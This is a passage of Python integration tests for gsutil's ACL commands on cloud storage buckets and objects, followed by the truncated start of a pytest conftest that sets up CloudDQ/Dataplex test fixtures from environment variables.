add = acl_helper.AclChange(self._project_test_acl + ':READ',
scope_type=acl_helper.ChangeType.PROJECT)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
add.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'READER', 'Project', self._project_test_acl)
remove = acl_helper.AclDel(self._project_test_acl)
remove.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHasNo(acl, 'READ', 'Project', self._project_test_acl)
def testAclDelWithGroup(self):
add = acl_helper.AclChange(self.USER_TEST_ADDRESS + ':READ',
scope_type=acl_helper.ChangeType.GROUP)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
add.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'READER', 'GroupByEmail', self.USER_TEST_ADDRESS)
remove = acl_helper.AclDel(self.USER_TEST_ADDRESS)
remove.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHasNo(acl, 'READER', 'GroupByEmail', self.GROUP_TEST_ADDRESS)
#
# Here are a whole lot of verbose asserts
#
def _AssertHas(self, current_acl, perm, scope, value=None):
matches = list(
self._YieldMatchingEntriesJson(current_acl, perm, scope, value))
self.assertEqual(1, len(matches))
def _AssertHasNo(self, current_acl, perm, scope, value=None):
matches = list(
self._YieldMatchingEntriesJson(current_acl, perm, scope, value))
self.assertEqual(0, len(matches))
def _YieldMatchingEntriesJson(self, current_acl, perm, scope, value=None):
"""Generator that yields entries that match the change descriptor.
Args:
current_acl: A list of apitools_messages.BucketAccessControls or
ObjectAccessControls which will be searched for matching
entries.
perm: Role (permission) to match.
scope: Scope type to match.
value: Value to match (against the scope type).
Yields:
An apitools_messages.BucketAccessControl or ObjectAccessControl.
"""
for entry in current_acl:
if (scope in ['UserById', 'GroupById'] and entry.entityId and
value == entry.entityId and entry.role == perm):
yield entry
elif (scope in ['UserByEmail', 'GroupByEmail'] and entry.email and
value == entry.email and entry.role == perm):
yield entry
elif (scope == 'GroupByDomain' and entry.domain and
value == entry.domain and entry.role == perm):
yield entry
elif (scope == 'Project' and entry.role == perm and
value == entry.entityId):
yield entry
elif (scope in ['AllUsers', 'AllAuthenticatedUsers'] and
entry.entity.lower() == scope.lower() and entry.role == perm):
yield entry
def _MakeScopeRegex(self, role, entity_type, email_address):
template_regex = (r'\{.*"entity":\s*"%s-%s".*"role":\s*"%s".*\}' %
(entity_type, email_address, role))
return re.compile(template_regex, flags=re.DOTALL)
def _MakeProjectScopeRegex(self, role, project_team, project_number):
template_regex = (
r'\{.*"entity":\s*"project-%s-%s",\s*"projectTeam":\s*\{\s*"'
r'projectNumber":\s*"%s",\s*"team":\s*"%s"\s*\},\s*"role":\s*"%s".*\}' %
(project_team, project_number, project_number, project_team, role))
return re.compile(template_regex, flags=re.DOTALL)
def testBucketAclChange(self):
"""Tests acl change on a bucket."""
test_regex = self._MakeScopeRegex('OWNER', 'user', self.USER_TEST_ADDRESS)
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(self.sample_uri)],
return_stdout=True)
self.assertNotRegex(json_text, test_regex)
self.RunGsUtil(
self._ch_acl_prefix +
['-u', self.USER_TEST_ADDRESS +
':fc', suri(self.sample_uri)])
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(self.sample_uri)],
return_stdout=True)
self.assertRegex(json_text, test_regex)
test_regex2 = self._MakeScopeRegex('WRITER', 'user', self.USER_TEST_ADDRESS)
self.RunGsUtil(self._ch_acl_prefix +
['-u', self.USER_TEST_ADDRESS + ':w',
suri(self.sample_uri)])
json_text2 = self.RunGsUtil(self._get_acl_prefix + [suri(self.sample_uri)],
return_stdout=True)
self.assertRegex(json_text2, test_regex2)
self.RunGsUtil(self._ch_acl_prefix +
['-d', self.USER_TEST_ADDRESS,
suri(self.sample_uri)])
json_text3 = self.RunGsUtil(self._get_acl_prefix + [suri(self.sample_uri)],
return_stdout=True)
self.assertNotRegex(json_text3, test_regex)
def testProjectAclChangesOnBucket(self):
"""Tests project entity acl changes on a bucket."""
if self.test_api == ApiSelector.XML:
stderr = self.RunGsUtil(
self._ch_acl_prefix +
['-p', self._project_test_acl + ':w',
suri(self.sample_uri)],
expected_status=1,
return_stderr=True)
self.assertIn(('CommandException: XML API does not support project'
' scopes, cannot translate ACL.'), stderr)
else:
test_regex = self._MakeProjectScopeRegex('WRITER', self._project_team,
self._project_number)
self.RunGsUtil(
self._ch_acl_prefix +
['-p', self._project_test_acl +
':w', suri(self.sample_uri)])
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(self.sample_uri)],
return_stdout=True)
self.assertRegex(json_text, test_regex)
self.RunGsUtil(self._ch_acl_prefix +
['-d', self._project_test_acl,
suri(self.sample_uri)])
json_text2 = self.RunGsUtil(self._get_acl_prefix +
[suri(self.sample_uri)],
return_stdout=True)
self.assertNotRegex(json_text2, test_regex)
def testObjectAclChange(self):
"""Tests acl change on an object."""
obj = self.CreateObject(bucket_uri=self.sample_uri, contents=b'something')
self.AssertNObjectsInBucket(self.sample_uri, 1)
test_regex = self._MakeScopeRegex('READER', 'group',
self.GROUP_TEST_ADDRESS)
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertNotRegex(json_text, test_regex)
self.RunGsUtil(self._ch_acl_prefix +
['-g', self.GROUP_TEST_ADDRESS +
':READ', suri(obj)])
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertRegex(json_text, test_regex)
test_regex2 = self._MakeScopeRegex('OWNER', 'group',
self.GROUP_TEST_ADDRESS)
self.RunGsUtil(self._ch_acl_prefix +
['-g', self.GROUP_TEST_ADDRESS + ':OWNER',
suri(obj)])
json_text2 = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertRegex(json_text2, test_regex2)
self.RunGsUtil(self._ch_acl_prefix +
['-d', self.GROUP_TEST_ADDRESS,
suri(obj)])
json_text3 = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertNotRegex(json_text3, test_regex2)
all_auth_regex = re.compile(
r'\{.*"entity":\s*"allAuthenticatedUsers".*"role":\s*"OWNER".*\}',
flags=re.DOTALL)
self.RunGsUtil(self._ch_acl_prefix + ['-g', 'AllAuth:O', suri(obj)])
json_text4 = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertRegex(json_text4, all_auth_regex)
def testObjectAclChangeAllUsers(self):
"""Tests acl ch AllUsers:R on an object."""
obj = self.CreateObject(bucket_uri=self.sample_uri, contents=b'something')
self.AssertNObjectsInBucket(self.sample_uri, 1)
all_users_regex = re.compile(
r'\{.*"entity":\s*"allUsers".*"role":\s*"READER".*\}', flags=re.DOTALL)
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertNotRegex(json_text, all_users_regex)
self.RunGsUtil(self._ch_acl_prefix + ['-g', 'AllUsers:R', suri(obj)])
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertRegex(json_text, all_users_regex)
def testSeekAheadAcl(self):
"""Tests seek-ahead iterator with ACL sub-commands."""
object_uri = self.CreateObject(contents=b'foo')
# Get the object's current ACL for application via set.
current_acl = self.RunGsUtil(['acl', 'get', suri(object_uri)],
return_stdout=True)
current_acl_file = self.CreateTempFile(contents=current_acl.encode(UTF8))
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '1'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'acl', 'ch', '-u', 'AllUsers:R',
suri(object_uri)],
return_stderr=True)
self.assertIn('Estimated work for this command: objects: 1\n', stderr)
stderr = self.RunGsUtil(
['-m', 'acl', 'set', current_acl_file,
suri(object_uri)],
return_stderr=True)
self.assertIn('Estimated work for this command: objects: 1\n', stderr)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '0'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'acl', 'ch', '-u', 'AllUsers:R',
suri(object_uri)],
return_stderr=True)
self.assertNotIn('Estimated work', stderr)
def testMultithreadedAclChange(self, count=10):
"""Tests multi-threaded acl changing on several objects."""
objects = []
for i in range(count):
objects.append(
self.CreateObject(bucket_uri=self.sample_uri,
contents='something {0}'.format(i).encode('ascii')))
self.AssertNObjectsInBucket(self.sample_uri, count)
test_regex = self._MakeScopeRegex('READER', 'group',
self.GROUP_TEST_ADDRESS)
json_texts = []
for obj in objects:
json_texts.append(
self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True))
for json_text in json_texts:
self.assertNotRegex(json_text, test_regex)
uris = [suri(obj) for obj in objects]
self.RunGsUtil(['-m', '-DD'] + self._ch_acl_prefix +
['-g', self.GROUP_TEST_ADDRESS + ':READ'] + uris)
json_texts = []
for obj in objects:
json_texts.append(
self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True))
for json_text in json_texts:
self.assertRegex(json_text, test_regex)
def testRecursiveChangeAcl(self):
"""Tests recursively changing ACLs on nested objects."""
obj = self.CreateObject(bucket_uri=self.sample_uri,
object_name='foo/bar',
contents=b'something')
self.AssertNObjectsInBucket(self.sample_uri, 1)
test_regex = self._MakeScopeRegex('READER', 'group',
self.GROUP_TEST_ADDRESS)
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertNotRegex(json_text, test_regex)
@Retry(AssertionError, tries=5, timeout_secs=1)
def _AddAcl():
self.RunGsUtil(
self._ch_acl_prefix +
['-R', '-g', self.GROUP_TEST_ADDRESS + ':READ',
suri(obj)[:-3]])
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertRegex(json_text, test_regex)
_AddAcl()
@Retry(AssertionError, tries=5, timeout_secs=1)
def _DeleteAcl():
# Make sure we treat grant addresses case insensitively.
delete_grant = self.GROUP_TEST_ADDRESS.upper()
self.RunGsUtil(self._ch_acl_prefix + ['-d', delete_grant, suri(obj)])
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertNotRegex(json_text, test_regex)
_DeleteAcl()
def testMultiVersionSupport(self):
"""Tests changing ACLs on multiple object versions."""
bucket = self.CreateVersionedBucket()
object_name = self.MakeTempName('obj')
obj1_uri = self.CreateObject(bucket_uri=bucket,
object_name=object_name,
contents=b'One thing')
# Create another on the same URI, giving us a second version.
self.CreateObject(bucket_uri=bucket,
object_name=object_name,
contents=b'Another thing',
gs_idempotent_generation=urigen(obj1_uri))
lines = self.AssertNObjectsInBucket(bucket, 2, versioned=True)
obj_v1, obj_v2 = lines[0], lines[1]
test_regex = self._MakeScopeRegex('READER', 'group',
self.GROUP_TEST_ADDRESS)
json_text = self.RunGsUtil(self._get_acl_prefix + [obj_v1],
return_stdout=True)
self.assertNotRegex(json_text, test_regex)
self.RunGsUtil(self._ch_acl_prefix +
['-g', self.GROUP_TEST_ADDRESS + ':READ', obj_v1])
json_text = self.RunGsUtil(self._get_acl_prefix + [obj_v1],
return_stdout=True)
self.assertRegex(json_text, test_regex)
json_text = self.RunGsUtil(self._get_acl_prefix + [obj_v2],
return_stdout=True)
self.assertNotRegex(json_text, test_regex)
def testBadRequestAclChange(self):
stdout, stderr = self.RunGsUtil(
self._ch_acl_prefix +
['-u', 'invalid_$$@hello.com:R',
suri(self.sample_uri)],
return_stdout=True,
return_stderr=True,
expected_status=1)
self.assertIn('BadRequestException', stderr)
self.assertNotIn('Retrying', stdout)
self.assertNotIn('Retrying', stderr)
def testAclGetWithoutFullControl(self):
object_uri = self.CreateObject(contents=b'foo')
expected_error_regex = r'Anonymous \S+ do(es)? not have'
with self.SetAnonymousBotoCreds():
stderr = self.RunGsUtil(self._get_acl_prefix + [suri(object_uri)],
return_stderr=True,
expected_status=1)
self.assertRegex(stderr, expected_error_regex)
def testTooFewArgumentsFails(self):
"""Tests calling ACL commands with insufficient number of arguments."""
# No arguments for get, but valid subcommand.
stderr = self.RunGsUtil(self._get_acl_prefix,
return_stderr=True,
expected_status=1)
self.assertIn('command requires at least', stderr)
# No arguments for set, but valid subcommand.
stderr = self.RunGsUtil(self._set_acl_prefix,
return_stderr=True,
expected_status=1)
self.assertIn('command requires at least', stderr)
# No arguments for ch, but valid subcommand.
stderr = self.RunGsUtil(self._ch_acl_prefix,
return_stderr=True,
expected_status=1)
self.assertIn('command requires at least', stderr)
# Neither arguments nor subcommand.
stderr = self.RunGsUtil(['acl'], return_stderr=True, expected_status=1)
self.assertIn('command requires at least', stderr)
def testMinusF(self):
"""Tests -f option to continue after failure."""
bucket_uri = self.CreateBucket()
obj_uri = suri(
self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo'))
acl_string = self.RunGsUtil(self._get_acl_prefix + [obj_uri],
return_stdout=True)
self.RunGsUtil(self._set_acl_prefix +
['-f', 'public-read',
suri(bucket_uri) + 'foo2', obj_uri],
expected_status=1)
acl_string2 = self.RunGsUtil(self._get_acl_prefix + [obj_uri],
return_stdout=True)
self.assertNotEqual(acl_string, acl_string2)
class TestS3CompatibleAcl(TestAclBase):
"""ACL integration tests that work for s3 and gs URLs."""
def testAclObjectGetSet(self):
bucket_uri = self.CreateBucket()
obj_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
self.AssertNObjectsInBucket(bucket_uri, 1)
stdout = self.RunGsUtil(self._get_acl_prefix + [suri(obj_uri)],
return_stdout=True)
set_contents = self.CreateTempFile(contents=stdout.encode(UTF8))
self.RunGsUtil(self._set_acl_prefix + [set_contents, suri(obj_uri)])
def testAclBucketGetSet(self):
bucket_uri = self.CreateBucket()
stdout = self.RunGsUtil(self._get_acl_prefix + [suri(bucket_uri)],
return_stdout=True)
set_contents = self.CreateTempFile(contents=stdout.encode(UTF8))
self.RunGsUtil(self._set_acl_prefix + [set_contents, suri(bucket_uri)])
@SkipForGS('S3 ACLs accept XML and should not cause an XML warning.')
class TestS3OnlyAcl(TestAclBase):
"""ACL integration tests that work only for s3 URLs."""
# TODO: Format all test case names consistently.
def test_set_xml_acl(self):
"""Ensures XML content does not return an XML warning for S3."""
obj_uri = suri(self.CreateObject(contents=b'foo'))
inpath = self.CreateTempFile(contents=b'<ValidXml></ValidXml>')
stderr = self.RunGsUtil(self._set_acl_prefix + [inpath, obj_uri],
return_stderr=True,
expected_status=1)
self.assertIn('BadRequestException', stderr)
self.assertNotIn('XML ACL data provided', stderr)
def test_set_xml_acl_bucket(self):
"""Ensures XML content does not return an XML warning for S3."""
bucket_uri = suri(self.CreateBucket())
inpath = self.CreateTempFile(contents=b'<ValidXml></ValidXml>')
stderr = self.RunGsUtil(self._set_acl_prefix + [inpath, bucket_uri],
return_stderr=True,
expected_status=1)
self.assertIn('BadRequestException', stderr)
self.assertNotIn('XML ACL data provided', stderr)
class TestAclOldAlias(TestAcl):
_set_acl_prefix = ['setacl']
_get_acl_prefix = ['getacl']
_set_defacl_prefix = ['setdefacl']
_ch_acl_prefix = ['chacl']
|
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pathlib import Path
import logging
import os
import shutil
import click.testing
import pytest
from clouddq.integration.bigquery.bigquery_client import BigQueryClient
from clouddq.integration.dataplex.clouddq_dataplex import CloudDqDataplexClient
from clouddq.lib import prepare_configs_cache
from clouddq.utils import working_directory
logger = logging.getLogger(__name__)
@pytest.fixture(scope="session")
def gcp_project_id():
gcp_project_id = os.environ.get('GOOGLE_CLOUD_PROJECT', None)
if not gcp_project_id:
logger.warning("Required test environment variable GOOGLE_CLOUD_PROJECT "
"cannot be found. Set this to the project_id used for integration testing.")
# Todo: remove this once test fixture for creating dataplex entities is complete
test_project_id = "dataplex-clouddq"
logging.warning(f"Defaulting to using test: {test_project_id}")
gcp_project_id = test_project_id
return gcp_project_id
@pytest.fixture(scope="session")
def gcp_bq_dataset():
gcp_bq_dataset = os.environ.get('CLOUDDQ_BIGQUERY_DATASET', None)
if not gcp_bq_dataset:
logger.fatal("Required test environment variable CLOUDDQ_BIGQUERY_DATASET "
"cannot be found. Set this to the BigQuery dataset used for integration testing.")
return gcp_bq_dataset
@pytest.fixture(scope="session")
def gcp_bq_region():
gcp_bq_region = os.environ.get('CLOUDDQ_BIGQUERY_REGION', None)
if not gcp_bq_region:
logger.fatal("Required test environment variable CLOUDDQ_BIGQUERY_REGION "
"cannot be found. Set this to the BigQuery region used for integration testing.")
return gcp_bq_region
@pytest.fixture(scope="session")
def gcp_application_credentials():
gcp_application_credentials = os.environ.get('GOOGLE_APPLICATION_CREDENTIALS', None)
if not gcp_application_credentials:
logger.warning("Test environment variable GOOGLE_APPLICATION_CREDENTIALS "
"cannot be found. Set this to the exported service account key path used "
"for integration testing. The tests will proceed skipping all tests "
"involving exported service-account key credentials.")
if os.environ.get('GOOGLE_APPLICATION_CREDENTIALS', None) == "":
del os.environ["GOOGLE_APPLICATION_CREDENTIALS"]
return gcp_application_credentials
@pytest.fixture(scope="session")
def gcp_sa_key():
sa_key_path = os.environ.get('GOOGLE_SDK_CREDENTIALS', None)
if not sa_key_path:
logger.warning("Test environment variable GOOGLE_SDK_CREDENTIALS "
"cannot be found. Set this to the exported service account key "
"path used for integration testing. The tests will proceed skipping "
"all tests involving exported service-account key credentials.")
if os.environ["GOOGLE_SDK_CREDENTIALS"]:
del os.environ["GOOGLE_SDK_CREDENTIALS"]
return sa_key_path
@pytest.fixture(scope="session")
def gcp_impersonation_credentials():
gcp_impersonation_credentials = os.environ.get('IMPERSONATION_SERVICE_ACCOUNT', None)
if not gcp_impersonation_credentials:
logger.warning("Test environment variable IMPERSONATION_SERVICE_ACCOUNT "
"cannot be found. Set this to the service account name for impersonation "
"used for integration testing. The tests will proceed skipping all tests "
"involving service-account impersonation.")
if os.environ["IMPERSONATION_SERVICE_ACCOUNT"]:
del os.environ["IMPERSONATION_SERVICE_ACCOUNT"]
return gcp_impersonation_credentials
@pytest.fixture(scope="session")
def gcs_bucket_name():
gcs_bucket_name = os.environ.get('GCS_BUCKET_NAME', None)
if not gcs_bucket_name:
logger.fatal("Required test environment variable GCS_BUCKET_NAME "
"cannot be found. Set this to the GCS bucket name for staging "
"CloudDQ artifacts and configs.")
return gcs_bucket_name
@pytest.fixture(scope="session")
def gcs_clouddq_executable_path():
gcs_clouddq_executable_path = os.environ.get('GCS_CLOUDDQ_EXECUTABLE_PATH', None)
if not gcs_clouddq_executable_path:
logger.warning(
"Test environment variable GCS_CLOUDDQ_EXECUTABLE_PATH cannot be found. "
"Set this to the GCS bucket path for the pre-built CloudDQ file "
"`clouddq-executable.zip` and `clouddq-executable.zip.hashsum`. "
"If this is not set or empty, the test harness will look the the zip executable called "
"`clouddq_patched.zip` on local path and upload it to $GCS_BUCKET_NAME for testing.")
return gcs_clouddq_executable_path
@pytest.fixture(scope="session")
def gcp_dataplex_region():
gcp_dataplex_region = os.environ.get('DATAPLEX_REGION_ID', None)
if not gcp_dataplex_region:
logger.warning("Required test environment variable DATAPLEX_REGION_ID "
"cannot be found. Set this to the region id of the Dataplex Lake.")
# Todo: remove this once test fixture for creating dataplex entities is complete
test_region_id = "us-central1"
logging.warning(f"Defaulting to using test: {test_region_id}")
gcp_dataplex_region = test_region_id
return gcp_dataplex_region
@pytest.fixture(scope="session")
def gcp_dataplex_lake_name():
gcp_dataplex_lake_name = os.environ.get('DATAPLEX_LAKE_NAME', None)
if not gcp_dataplex_lake_name:
logger.fatal("Required test environment variable DATAPLEX_LAKE_NAME "
"cannot be found. Set this to the Dataplex Lake used for testing.")
# Todo: remove this once test fixture for creating dataplex entities is complete
test_lake_name = "amandeep-dev-lake"
logging.warning(f"Defaulting to using test: {test_lake_name}")
gcp_dataplex_lake_name = test_lake_name
return gcp_dataplex_lake_name
@pytest.fixture(scope="session")
def dataplex_endpoint():
dataplex_endpoint = os.environ.get('DATAPLEX_ENDPOINT', None)
if not dataplex_endpoint:
logger.warning("Required test environment variable DATAPLEX_ENDPOINT "
"cannot be found. Defaulting to the Dataplex Endpoint "
"'https://dataplex.googleapis.com'.")
dataplex_endpoint = "https://dataplex.googleapis.com"
return dataplex_endpoint
@pytest.fixture(scope="session")
def target_bq_result_dataset_name():
target_bq_result_dataset_name = os.environ.get('DATAPLEX_TARGET_BQ_DATASET', None)
if not target_bq_result_dataset_name:
logger.fatal("Required test environment variable DATAPLEX_TARGET_BQ_DATASET "
"cannot be found. Set this to the Target BQ Dataset used for testing.")
return target_bq_result_dataset_name
@pytest.fixture(scope="session")
def target_bq_result_table_name():
target_bq_result_table_name = os.environ.get('DATAPLEX_TARGET_BQ_TABLE', None)
if not target_bq_result_table_name:
logger.fatal("Required test environment variable DATAPLEX_TARGET_BQ_TABLE "
"cannot be found. Set this to the Target BQ Table used for testing.")
return target_bq_result_table_name
@pytest.fixture(scope="session")
def dataplex_task_service_account_name():
dataplex_task_service_account_name = os.environ.get('DATAPLEX_TASK_SA', None)
if not dataplex_task_service_account_name:
logger.fatal("Required test environment variable DATAPLEX_TASK_SA "
"cannot be found. Set this to the service account used for "
"running Dataplex Tasks in testing.")
return dataplex_task_service_account_name
@pytest.fixture(scope="session")
def gcp_dataplex_zone_id():
gcp_dataplex_zone_id = os.environ.get('DATAPLEX_ZONE_ID', None)
if not gcp_dataplex_zone_id:
logger.warning("Required test environment variable DATAPLEX_ZONE_ID cannot be found. "
"Set this to the Dataplex Zone used for testing.")
test_zone_id = "raw"
logging.warning(f"Defaulting to using test: {test_zone_id}")
gcp_dataplex_zone_id = test_zone_id
return gcp_dataplex_zone_id
@pytest.fixture(scope="session")
def gcp_dataplex_bucket_name():
gcp_dataplex_bucket_name = os.environ.get('DATAPLEX_BUCKET_NAME', None)
if not gcp_dataplex_bucket_name:
logger.warning("Required test environment variable DATAPLEX_BUCKET_NAME cannot be found. "
"Set this to the Dataplex gcs assets bucket name used for testing.")
# Todo: remove this once test fixture for creating dataplex entities is complete
test_bucket_name = "amandeep-dev-bucket"
logging.warning(f"Defaulting to using test: {test_bucket_name}")
gcp_dataplex_bucket_name = test_bucket_name
return gcp_dataplex_bucket_name
@pytest.fixture(scope="session")
def gcp_dataplex_bigquery_dataset_id():
gcp_dataplex_bigquery_dataset_id = os.environ.get('DATAPLEX_BIGQUERY_DATASET_ID', None)
if not gcp_dataplex_bigquery_dataset_id:
logger.fatal("Required test environment variable DATAPLEX_BIGQUERY_DATASET_ID cannot be found. "
"Set this to the Dataplex bigquery assets dataset id used for testing.")
# Todo: remove this once test fixture for creating dataplex entities is complete
test_dataset_id = "clouddq_test_asset_curated"
logging.warning(f"Defaulting to using test: {test_dataset_id}")
gcp_dataplex_bigquery_dataset_id = test_dataset_id
return gcp_dataplex_bigquery_dataset_id
@pytest.fixture(scope="session")
def test_dq_dataplex_client(dataplex_endpoint,
gcp_dataplex_lake_name,
gcp_dataplex_region,
gcp_project_id,
gcs_bucket_name):
gcp_project_id = gcp_project_id
gcs_bucket_name = gcs_bucket_name
yield CloudDqDataplexClient(dataplex_endpoint=dataplex_endpoint,
gcp_dataplex_lake_name=gcp_dataplex_lake_name,
gcp_dataplex_region=gcp_dataplex_region,
gcp_project_id=gcp_project_id,
gcs_bucket_name=gcs_bucket_name)
@pytest.fixture(scope="session")
def test_bigquery_client():
"""Get BigQuery Client using discovered ADC"""
client = BigQueryClient()
yield client
client.close_connection()
@pytest.fixture(scope="session")
def test_dataplex_metadata_defaults_configs(
gcp_dataplex_lake_name,
gcp_dataplex_region,
gcp_project_id,
gcp_dataplex_zone_id,):
dataplex_metadata_defaults = {
"projects": gcp_project_id,
"locations": gcp_dataplex_region,
"lakes": gcp_dataplex_lake_name,
"zones": gcp_dataplex_zone_id,
}
return dataplex_metadata_defaults
@pytest.fixture(scope="session")
def test_resources():
return Path("tests").joinpath("resources").absolute()
@pytest.fixture(scope="session")
def test_data():
return Path("tests").joinpath("data").absolute()
@pytest.fixture(scope="session")
def source_configs_path():
return Path("tests").joinpath("resources", "configs").absolute()
@pytest.fixture(scope="session")
def source_configs_file_path():
return Path("tests").joinpath("resources").joinpath("configs.yml").absolute()
@pytest.fixture(scope="session")
def source_dq_rules_configs_file_path():
return Path("tests").joinpath("resources").joinpath("dq_rules_configs.yml").absolute()
@pytest.fixture(scope="session")
def source_dq_advanced_rules_configs_path():
return Path("docs").joinpath("examples").joinpath("advanced_rules").absolute()
@pytest.fixture(scope="session")
def test_profiles_dir():
return Path("tests").joinpath("resources", "test_dbt_profiles_dir").absolute()
@pytest.fixture(scope="function")
def test_configs_cache(
source_configs_path,
tmp_path):
temp_path = Path(tmp_path).joinpath("clouddq_test_configs_cache")
temp_path.mkdir()
with working_directory(temp_path):
configs_cache = prepare_configs_cache(configs_path=source_configs_path)
yield configs_cache
@pytest.fixture(scope="function")
def test_default_dataplex_configs_cache(temp_configs_dir,
test_dq_dataplex_client,
test_dataplex_metadata_defaults_configs,
tmp_path,
test_bigquery_client):
temp_path = Path(tmp_path).joinpath("clouddq_test_configs_cache")
temp_path.mkdir()
with working_directory(temp_path):
configs_cache = prepare_configs_cache(configs_path=temp_configs_dir)
target_rule_binding_ids = [
row["id"] for row in
configs_cache._cache_db.query("select id from rule_bindings")
]
configs_cache.resolve_dataplex_entity_uris(
client=test_dq_dataplex_client,
bigquery_client=test_bigquery_client,
default_configs=test_dataplex_metadata_defaults_configs,
target_rule_binding_ids=target_rule_binding_ids
)
yield configs_cache
@pytest.fixture(scope="function")
def temp_configs_dir(
gcp_project_id,
gcp_dataplex_bigquery_dataset_id,
gcp_dataplex_region,
gcp_dataplex_lake_name,
gcp_dataplex_zone_id,
source_configs_path,
tmp_path):
# Create temp directory
temp_clouddq_dir = Path(tmp_path).joinpath("clouddq_test_artifacts")
# Copy over tests/resources/configs
configs_path = Path(temp_clouddq_dir).joinpath("configs")
_ = shutil.copytree(source_configs_path, configs_path)
# Prepare test config
test_data = configs_path.joinpath("entities", "test-data.yml")
with open(test_data) as source_file:
lines = source_file.read()
with open(test_data, "w") as source_file:
lines = lines.replace("<your_gcp_project_id>", gcp_project_id)
lines = lines.replace("<your_bigquery_dataset_id>", gcp_dataplex_bigquery_dataset_id)
source_file.write(lines)
# Prepare metadata_registry_default_configs
registry_defaults = configs_path.joinpath("metadata_registry_defaults.yml")
with open(registry_defaults) as source_file:
lines = source_file.read()
with open(registry_defaults, "w") as source_file:
lines = lines.replace("<my-gcp-dataplex-lake-id>", gcp_dataplex_lake_name)
lines = lines.replace("<my-gcp-dataplex-region-id>", gcp_dataplex_region)
lines = lines.replace("<my-gcp-project-id>", gcp_project_id)
lines = lines.replace("<my-gcp-dataplex-zone-id>", gcp_dataplex_zone_id)
source_file.write(lines)
# Prepare entity_uri configs
registry_defaults = configs_path.joinpath("rule_bindings", "team-4-rule-bindings.yml")
with open(registry_defaults) as source_file:
lines = source_file.read()
with open(registry_defaults, "w") as source_file:
lines = lines.replace("<my-gcp-dataplex-lake-id>", gcp_dataplex_lake_name)
lines = lines.replace("<my-gcp-dataplex-region-id>", gcp_dataplex_region)
lines = lines.replace("<my-gcp-project-id>", gcp_project_id)
lines = lines.replace("<my-gcp-dataplex-zone-id>", gcp_dataplex_zone_id)
lines = lines.replace("<my_bigquery_dataset_id>", gcp_dataplex_bigquery_dataset_id)
source_file.write(lines)
# prepare gcs entity_uri configs
registry_defaults = configs_path.joinpath("rule_bindings", "team-5-rule-bindings.yml")
with open(registry_defaults) as source_file:
lines = source_file.read()
with open(registry_defaults, "w") as source_file:
lines = lines.replace("<my-gcp-dataplex-lake-id>", gcp_dataplex_lake_name)
lines = lines.replace("<my-gcp-dataplex-region-id>", gcp_dataplex_region)
lines = lines.replace("<my-gcp-project-id>", gcp_project_id)
lines = lines.replace("<my-gcp-dataplex-zone-id>", gcp_dataplex_zone_id)
lines = lines.replace("<my_bigquery_dataset_id>", gcp_dataplex_bigquery_dataset_id)
source_file.write(lines)
# prepare partitioned gcs entity_uri configs
registry_defaults = configs_path.joinpath("rule_bindings", "team-6-rule-bindings.yml")
with open(registry_defaults) as source_file:
lines = source_file.read()
with open(registry_defaults, "w") as source_file:
lines = lines.replace("<my-gcp-dataplex-lake-id>", gcp_dataplex_lake_name)
lines = lines.replace("<my-gcp-dataplex-region-id>", gcp_dataplex_region)
lines = lines.replace("<my-gcp-project-id>", gcp_project_id)
lines = lines.replace("<my-gcp-dataplex-zone-id>", gcp_dataplex_zone_id)
lines = lines.replace("<my_bigquery_dataset_id>", gcp_dataplex_bigquery_dataset_id)
source_file.write(lines)
# prepare bq native entity_uri configs
registry_defaults = configs_path.joinpath("rule_bindings", "team-7-rule-bindings.yml")
with open(registry_defaults) as source_file:
lines = source_file.read()
with open(registry_defaults, "w") as source_file:
lines = lines.replace("<my-gcp-dataplex-lake-id>", gcp_dataplex_lake_name)
lines = lines.replace("<my-gcp-dataplex-region-id>", gcp_dataplex_region)
lines = lines.replace("<my-gcp-project-id>", gcp_project_id)
lines = lines.replace("<my-gcp-dataplex-zone-id>", gcp_dataplex_zone_id)
lines = lines.replace("<my_bigquery_dataset_id>", gcp_dataplex_bigquery_dataset_id)
source_file.write(lines)
# prepare partitioned bq native entity_uri configs
registry_defaults = configs_path.joinpath("rule_bindings", "team-8-rule-bindings.yml")
with open(registry_defaults) as source_file:
lines = source_file.read()
with open(registry_defaults, "w") as source_file:
